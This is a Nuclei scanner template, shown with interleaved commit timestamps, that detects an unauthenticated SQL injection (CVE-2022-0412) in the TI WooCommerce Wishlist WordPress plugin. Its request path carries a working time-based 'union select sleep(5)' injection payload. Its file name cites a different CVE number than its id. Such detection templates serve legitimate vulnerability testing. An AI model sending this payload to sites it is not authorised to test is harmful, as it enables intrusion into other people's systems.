nuclei-templates/cves/2022/CVE-2022-0349.yaml

38 lines
1.2 KiB
YAML
Raw Normal View History

2022-10-04 08:55:13 +00:00
id: CVE-2022-0412
2022-10-01 13:26:09 +00:00
info:
2022-10-04 08:55:13 +00:00
name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection
2022-10-01 13:26:09 +00:00
author: edoardottt
severity: critical
description: |
2022-10-04 08:55:13 +00:00
The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks.
2022-10-01 13:26:09 +00:00
reference:
2022-10-04 08:55:13 +00:00
- https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
- https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0412
2022-10-01 13:26:09 +00:00
classification:
2022-10-04 08:55:13 +00:00
cve-id: CVE-2022-0412
metadata:
verified: true
tags: cve,cve2022,woocommerce,wordpress,wp-plugin,wp,sqli
2022-10-01 13:26:09 +00:00
requests:
2022-10-04 08:55:13 +00:00
- method: GET
path:
- "{{BaseURL}}/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g"
2022-10-01 13:26:09 +00:00
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
2022-10-04 08:55:13 +00:00
- type: word
part: body
words:
- 'Product not found'
2022-10-01 13:26:09 +00:00
- type: status
status:
2022-10-04 08:55:13 +00:00
- 400